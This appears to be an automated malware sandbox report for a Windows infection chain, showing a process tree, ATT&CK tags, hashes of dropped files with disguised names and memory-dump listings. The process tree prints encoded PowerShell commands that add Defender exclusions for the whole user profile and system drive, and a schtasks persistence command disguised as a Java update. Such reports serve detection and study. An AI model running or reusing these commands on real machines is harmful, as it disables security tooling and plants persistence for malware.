- Suspicious use of WriteProcessMemory
PID:612

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
4⤵
PID:1320

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "JavaUpdate" /tr "C:\Users\Admin\JavaUpdate.exe"
3⤵
PID:748

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "JavaUpdate" /tr "C:\Users\Admin\JavaUpdate.exe"
4⤵
- Creates scheduled task(s)
PID:1116

C:\Windows\system32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\JavaUpdate.exe"
3⤵
- Loads dropped DLL
PID:1712

C:\Users\Admin\JavaUpdate.exe
C:\Users\Admin\JavaUpdate.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:608

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
5⤵
PID:1996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
6⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
6⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
5⤵
- Executes dropped EXE
PID:1448

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "tpfijyehtrsawy"
6⤵
PID:564

C:\Windows\system32\taskeng.exe
taskeng.exe {543ACCD8-DF35-4F5C-A9FE-3CDE951E2062} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1080

C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
PID:1660

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Installer.exe
MD5
a29afa716d32438781d7bd9f490f2d82

SHA1
ee28162c74520655e1e92bcaf7a2cab81547234b

SHA256
9e0420e8eb290152971194d8283b5161dd02a9b3c3f876edcb75ea5c8253191f

SHA512
e1e819052b9e14c5a5ea896215ea95d1b1b6971876f6aa6602bc48cb61c7d61ad8517fd53ca71d7eff5c9257ee0213f21d5561c3058f2298cc2b0d7ad15ae6f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installer.exe
MD5
a29afa716d32438781d7bd9f490f2d82

SHA1
ee28162c74520655e1e92bcaf7a2cab81547234b

SHA256
9e0420e8eb290152971194d8283b5161dd02a9b3c3f876edcb75ea5c8253191f

SHA512
e1e819052b9e14c5a5ea896215ea95d1b1b6971876f6aa6602bc48cb61c7d61ad8517fd53ca71d7eff5c9257ee0213f21d5561c3058f2298cc2b0d7ad15ae6f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Khgstquy.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Khgstquy.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe
MD5
856ad5c82117630907fc0c3fb75e5696

SHA1
9890b478440afc80ef4c029d37a8d0e016c9cd82

SHA256
d73371bf6af5a0962765e506bed7bd04cf0fa949fe0bd323c76900010d2337c0

SHA512
9db4604ac7ee2f6453bc099e75734b911f02e6af653c4c5d31a6ffddf353227632dd929360f9b7c5cccd07dce898382ff328494712a512b2cf088b269df97fdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe
MD5
856ad5c82117630907fc0c3fb75e5696

SHA1
9890b478440afc80ef4c029d37a8d0e016c9cd82

SHA256
d73371bf6af5a0962765e506bed7bd04cf0fa949fe0bd323c76900010d2337c0

SHA512
9db4604ac7ee2f6453bc099e75734b911f02e6af653c4c5d31a6ffddf353227632dd929360f9b7c5cccd07dce898382ff328494712a512b2cf088b269df97fdb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
MD5
541ebd27434e01ef36fb17fbb197565b

SHA1
3313d0e2bff470b4c2c6200a881ffd75054d5763

SHA256
58bf6d4db80009df3b5f9967d54575f459087100498eab59a7b13f5aa44d1e6d

SHA512
5f6e08a24a77c45cda674cad771293ede99dd4d62011e3d171579c09483c065484d0705532b6610561474e4c9e0c85d9d1456064bc958392630a53e0fea57b02

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
MD5
541ebd27434e01ef36fb17fbb197565b

SHA1
3313d0e2bff470b4c2c6200a881ffd75054d5763

SHA256
58bf6d4db80009df3b5f9967d54575f459087100498eab59a7b13f5aa44d1e6d

SHA512
5f6e08a24a77c45cda674cad771293ede99dd4d62011e3d171579c09483c065484d0705532b6610561474e4c9e0c85d9d1456064bc958392630a53e0fea57b02

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
MD5
541ebd27434e01ef36fb17fbb197565b

SHA1
3313d0e2bff470b4c2c6200a881ffd75054d5763

SHA256
58bf6d4db80009df3b5f9967d54575f459087100498eab59a7b13f5aa44d1e6d

SHA512
5f6e08a24a77c45cda674cad771293ede99dd4d62011e3d171579c09483c065484d0705532b6610561474e4c9e0c85d9d1456064bc958392630a53e0fea57b02

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
MD5
839bdfa9e45662b4cfce43dbceb5f88b

SHA1
bb275f39188b48877de04d91b4c265c39cf41110

SHA256
0f605389ccc26a71805a47724a20cdedef03becb8222fe1f804d36492fa0e45b

SHA512
32c0afac6249eb9619e3467f8812c3c27141bb46caf97692150bfa3471060e7175d6fef3977215623f191704635fc815bbfdb4f46923494ae7f995da19726954

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
76e444acd3412b89f71ff0779f09689b

SHA1
eec5ecb4b11f53d7204e27555d7079d05d5b1c51

SHA256
c0147162cf37c35553aa4366e0214f989ef2103ae97735852ef201f59d127095

SHA512
fc3211eb1e10513c088cea49f8a23a2c2333837a0e99adc09b2e56353ae3b3e35491436827da8bef09554ac8742c223d2b98d7f1d8b8c9de7b11c1c6e1c283bf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
76e444acd3412b89f71ff0779f09689b

SHA1
eec5ecb4b11f53d7204e27555d7079d05d5b1c51

SHA256
c0147162cf37c35553aa4366e0214f989ef2103ae97735852ef201f59d127095

SHA512
fc3211eb1e10513c088cea49f8a23a2c2333837a0e99adc09b2e56353ae3b3e35491436827da8bef09554ac8742c223d2b98d7f1d8b8c9de7b11c1c6e1c283bf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
76e444acd3412b89f71ff0779f09689b

SHA1
eec5ecb4b11f53d7204e27555d7079d05d5b1c51

SHA256
c0147162cf37c35553aa4366e0214f989ef2103ae97735852ef201f59d127095

SHA512
fc3211eb1e10513c088cea49f8a23a2c2333837a0e99adc09b2e56353ae3b3e35491436827da8bef09554ac8742c223d2b98d7f1d8b8c9de7b11c1c6e1c283bf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
76e444acd3412b89f71ff0779f09689b

SHA1
eec5ecb4b11f53d7204e27555d7079d05d5b1c51

SHA256
c0147162cf37c35553aa4366e0214f989ef2103ae97735852ef201f59d127095

SHA512
fc3211eb1e10513c088cea49f8a23a2c2333837a0e99adc09b2e56353ae3b3e35491436827da8bef09554ac8742c223d2b98d7f1d8b8c9de7b11c1c6e1c283bf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
76e444acd3412b89f71ff0779f09689b

SHA1
eec5ecb4b11f53d7204e27555d7079d05d5b1c51

SHA256
c0147162cf37c35553aa4366e0214f989ef2103ae97735852ef201f59d127095

SHA512
fc3211eb1e10513c088cea49f8a23a2c2333837a0e99adc09b2e56353ae3b3e35491436827da8bef09554ac8742c223d2b98d7f1d8b8c9de7b11c1c6e1c283bf

Download Submit
C:\Users\Admin\AppData\Roaming\Remove.bat
MD5
ad29a839c20a29353411e3c81c2c9c02

SHA1
e9fbf4df7868f2bbd99e14d4fe0ac2dbc88ecb63

SHA256
21f6a53f02f45424018afe7d87e7af4a2006a61558de6fba42c4a7514de893e8

SHA512
4a930193e057f74ca70d06814824617451ddb3243a771235a1944b0e921aaabe2852bfe9ae0575942e91ce9435bf7aee2e1c03b89157cf431b2f1fd030b54fbf

Download Submit
C:\Users\Admin\Documents\JavaSheduler.exe
MD5
541ebd27434e01ef36fb17fbb197565b

SHA1
3313d0e2bff470b4c2c6200a881ffd75054d5763

SHA256
58bf6d4db80009df3b5f9967d54575f459087100498eab59a7b13f5aa44d1e6d

SHA512
5f6e08a24a77c45cda674cad771293ede99dd4d62011e3d171579c09483c065484d0705532b6610561474e4c9e0c85d9d1456064bc958392630a53e0fea57b02

Download Submit
C:\Users\Admin\Documents\JavaSheduler.exe
MD5
541ebd27434e01ef36fb17fbb197565b

SHA1
3313d0e2bff470b4c2c6200a881ffd75054d5763

SHA256
58bf6d4db80009df3b5f9967d54575f459087100498eab59a7b13f5aa44d1e6d

SHA512
5f6e08a24a77c45cda674cad771293ede99dd4d62011e3d171579c09483c065484d0705532b6610561474e4c9e0c85d9d1456064bc958392630a53e0fea57b02

Download Submit
C:\Users\Admin\Documents\JavaUpdaters.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\Documents\JavaUpdaters.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\Documents\SecurityHealthSystray.exe
MD5
b5a450cd4f12a397920ef54974eacb3e

SHA1
8bbcd3c68255a996a91782c64250d13155dc04d0

SHA256
61665565d9238f8bdc6c73d97d4b92d3a97b6544c8512ba3f5531ccce232cb3d

SHA512
947ba67d3251aba352a4fb5c4b90e6e0b28459940bd4003c9e004b6b2b05a19dec56c97c66565b1fd084c70aa191ef538c4a3dffaff35a73b66e671b403964cc

Download Submit
C:\Users\Admin\Documents\SecurityHealthSystray.exe
MD5
b5a450cd4f12a397920ef54974eacb3e

SHA1
8bbcd3c68255a996a91782c64250d13155dc04d0

SHA256
61665565d9238f8bdc6c73d97d4b92d3a97b6544c8512ba3f5531ccce232cb3d

SHA512
947ba67d3251aba352a4fb5c4b90e6e0b28459940bd4003c9e004b6b2b05a19dec56c97c66565b1fd084c70aa191ef538c4a3dffaff35a73b66e671b403964cc

Download Submit
C:\Users\Admin\Documents\SecurityHealthSystray.exe
MD5
b5a450cd4f12a397920ef54974eacb3e

SHA1
8bbcd3c68255a996a91782c64250d13155dc04d0

SHA256
61665565d9238f8bdc6c73d97d4b92d3a97b6544c8512ba3f5531ccce232cb3d

SHA512
947ba67d3251aba352a4fb5c4b90e6e0b28459940bd4003c9e004b6b2b05a19dec56c97c66565b1fd084c70aa191ef538c4a3dffaff35a73b66e671b403964cc

Download Submit
C:\Users\Admin\Documents\redlineTacNine.exe
MD5
80099430fb50d4c31c7ce28e2cb0fef5

SHA1
1fbaa22a5d6c76ee2d6645ec922fc449ade78581

SHA256
0da9fd34d122db7737e8748fd3ca6b2f7a9606e52bb0168efc3c64cf2e2c4d44

SHA512
d1a928631c35df015c58806b754191877c18951594a5d1d7808fd0ac024f1cceb8413515c609374075e797a487f4f995542c1d641bf1fd661bcac654f3cfecc5

Download Submit
C:\Users\Admin\Documents\redlineTacNine.exe
MD5
80099430fb50d4c31c7ce28e2cb0fef5

SHA1
1fbaa22a5d6c76ee2d6645ec922fc449ade78581

SHA256
0da9fd34d122db7737e8748fd3ca6b2f7a9606e52bb0168efc3c64cf2e2c4d44

SHA512
d1a928631c35df015c58806b754191877c18951594a5d1d7808fd0ac024f1cceb8413515c609374075e797a487f4f995542c1d641bf1fd661bcac654f3cfecc5

Download Submit
C:\Users\Admin\JavaUpdate.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\JavaUpdate.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\JavaUpdate.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\JavaUpdate.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\Installer.exe
MD5
a29afa716d32438781d7bd9f490f2d82

SHA1
ee28162c74520655e1e92bcaf7a2cab81547234b

SHA256
9e0420e8eb290152971194d8283b5161dd02a9b3c3f876edcb75ea5c8253191f

SHA512
e1e819052b9e14c5a5ea896215ea95d1b1b6971876f6aa6602bc48cb61c7d61ad8517fd53ca71d7eff5c9257ee0213f21d5561c3058f2298cc2b0d7ad15ae6f4

Download Submit
\Users\Admin\AppData\Local\Temp\Khgstquy.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe
MD5
856ad5c82117630907fc0c3fb75e5696

SHA1
9890b478440afc80ef4c029d37a8d0e016c9cd82

SHA256
d73371bf6af5a0962765e506bed7bd04cf0fa949fe0bd323c76900010d2337c0

SHA512
9db4604ac7ee2f6453bc099e75734b911f02e6af653c4c5d31a6ffddf353227632dd929360f9b7c5cccd07dce898382ff328494712a512b2cf088b269df97fdb

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
MD5
839bdfa9e45662b4cfce43dbceb5f88b

SHA1
bb275f39188b48877de04d91b4c265c39cf41110

SHA256
0f605389ccc26a71805a47724a20cdedef03becb8222fe1f804d36492fa0e45b

SHA512
32c0afac6249eb9619e3467f8812c3c27141bb46caf97692150bfa3471060e7175d6fef3977215623f191704635fc815bbfdb4f46923494ae7f995da19726954

Download Submit
\Users\Admin\Documents\JavaUpdaters.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
\Users\Admin\JavaUpdate.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
memory/544-93-0x0000000000000000-mapping.dmp

Download
memory/544-111-0x0000000002390000-0x0000000002FDA000-memory.dmp

Filesize
12.3MB

Download
memory/544-109-0x0000000002390000-0x0000000002FDA000-memory.dmp

Filesize
12.3MB

Download
memory/544-110-0x0000000002390000-0x0000000002FDA000-memory.dmp

Filesize
12.3MB

Download
memory/564-269-0x000000001AD02000-0x000000001AD04000-memory.dmp

Filesize
8KB

Download
memory/564-270-0x000000001AD04000-0x000000001AD06000-memory.dmp

Filesize
8KB

Download
memory/564-268-0x0000000000060000-0x0000000000067000-memory.dmp

Filesize
28KB

Download
memory/564-271-0x000000001AD06000-0x000000001AD07000-memory.dmp

Filesize
4KB

Download
memory/564-272-0x000000001AD07000-0x000000001AD08000-memory.dmp

Filesize
4KB

Download
memory/608-210-0x000000001C2F7000-0x000000001C2F8000-memory.dmp

Filesize
4KB

Download
memory/608-209-0x000000001C2F6000-0x000000001C2F7000-memory.dmp

Filesize
4KB

Download
memory/608-189-0x0000000000000000-mapping.dmp

Download
memory/608-204-0x000000001C2F2000-0x000000001C2F4000-memory.dmp

Filesize
8KB

Download
memory/608-208-0x000000001C2F4000-0x000000001C2F6000-memory.dmp

Filesize
8KB

Download
memory/612-113-0x0000000000A70000-0x0000000000E78000-memory.dmp

Filesize
4.0MB

Download
memory/612-114-0x000000001C770000-0x000000001CB74000-memory.dmp

Filesize
4.0MB

Download
memory/612-64-0x0000000000000000-mapping.dmp

Download
memory/612-120-0x0000000003626000-0x0000000003627000-memory.dmp

Filesize
4KB

Download
memory/612-119-0x0000000003624000-0x0000000003626000-memory.dmp

Filesize
8KB

Download
memory/612-118-0x0000000003622000-0x0000000003624000-memory.dmp

Filesize
8KB

Download
memory/612-121-0x0000000003627000-0x0000000003628000-memory.dmp

Filesize
4KB

Download
memory/748-157-0x0000000000000000-mapping.dmp

Download
memory/776-57-0x0000000075901000-0x0000000075903000-memory.dmp

Filesize
8KB

Download
memory/776-58-0x0000000004E70000-0x0000000004E71000-memory.dmp

Filesize
4KB

Download
memory/776-55-0x0000000000400000-0x0000000000401000-memory.dmp

Filesize
4KB

Download
memory/812-205-0x000000001C424000-0x000000001C426000-memory.dmp

Filesize
8KB

Download
memory/812-217-0x000000001C426000-0x000000001C427000-memory.dmp

Filesize
4KB

Download
memory/812-192-0x0000000000000000-mapping.dmp

Download
memory/812-212-0x000000001C422000-0x000000001C424000-memory.dmp

Filesize
8KB

Download
memory/812-207-0x000000001C427000-0x000000001C428000-memory.dmp

Filesize
4KB

Download
memory/832-191-0x0000000000000000-mapping.dmp

Download
memory/976-75-0x0000000000000000-mapping.dmp

Download
memory/976-138-0x000000001C514000-0x000000001C516000-memory.dmp

Filesize
8KB

Download
memory/976-135-0x000000001C512000-0x000000001C514000-memory.dmp

Filesize
8KB

Download
memory/976-139-0x000000001C516000-0x000000001C517000-memory.dmp

Filesize
4KB

Download
memory/976-140-0x000000001C517000-0x000000001C518000-memory.dmp

Filesize
4KB

Download
memory/996-159-0x0000000000000000-mapping.dmp

Download
memory/1052-116-0x0000000000000000-mapping.dmp

Download
memory/1052-213-0x0000000001E90000-0x0000000001E92000-memory.dmp

Filesize
8KB

Download
memory/1052-214-0x0000000001E92000-0x0000000001E94000-memory.dmp

Filesize
8KB

Download
memory/1052-226-0x0000000001E9B000-0x0000000001EBA000-memory.dmp

Filesize
124KB

Download
memory/1052-222-0x000000001B760000-0x000000001BA5F000-memory.dmp

Filesize
3.0MB

Download
memory/1052-216-0x0000000001E94000-0x0000000001E97000-memory.dmp

Filesize
12KB

Download
memory/1052-202-0x000007FEEA420000-0x000007FEEAF7D000-memory.dmp

Filesize
11.4MB

Download
memory/1052-197-0x0000000000000000-mapping.dmp

Download
memory/1068-97-0x0000000000790000-0x00000000007E2000-memory.dmp

Filesize
328KB

Download
memory/1068-84-0x0000000000000000-mapping.dmp

Download
memory/1068-90-0x00000000001B0000-0x00000000001B1000-memory.dmp

Filesize
4KB

Download
memory/1068-112-0x0000000006810000-0x00000000069F1000-memory.dmp

Filesize
1.9MB

Download
memory/1068-164-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/1116-158-0x0000000000000000-mapping.dmp

Download
memory/1116-101-0x0000000000000000-mapping.dmp

Download
memory/1124-242-0x00000000022E2000-0x00000000022E4000-memory.dmp

Filesize
8KB

Download
memory/1124-236-0x000007FEE96C0000-0x000007FEEA21D000-memory.dmp

Filesize
11.4MB

Download
memory/1124-240-0x00000000022E0000-0x00000000022E2000-memory.dmp

Filesize
8KB

Download
memory/1124-241-0x000000001B780000-0x000000001BA7F000-memory.dmp

Filesize
3.0MB

Download
memory/1124-229-0x0000000000000000-mapping.dmp

Download
memory/1124-243-0x00000000022E4000-0x00000000022E7000-memory.dmp

Filesize
12KB

Download
memory/1124-244-0x00000000022EB000-0x000000000230A000-memory.dmp

Filesize
124KB

Download
memory/1152-163-0x0000000000000000-mapping.dmp

Download
memory/1196-130-0x0000000000000000-mapping.dmp

Download
memory/1220-66-0x0000000000070000-0x0000000000071000-memory.dmp

Filesize
4KB

Download
memory/1220-60-0x0000000000000000-mapping.dmp

Download
memory/1320-147-0x0000000000000000-mapping.dmp

Download
memory/1372-160-0x0000000000000000-mapping.dmp

Download
memory/1372-262-0x0000000140310068-mapping.dmp

Download
memory/1372-249-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/1372-264-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/1408-94-0x0000000000000000-mapping.dmp

Download
memory/1448-247-0x0000000000000000-mapping.dmp

Download
memory/1488-206-0x0000000000000000-mapping.dmp

Download
memory/1512-141-0x0000000002942000-0x0000000002944000-memory.dmp

Filesize
8KB

Download
memory/1512-142-0x0000000002944000-0x0000000002947000-memory.dmp

Filesize
12KB

Download
memory/1512-136-0x000007FEEA420000-0x000007FEEAF7D000-memory.dmp

Filesize
11.4MB

Download
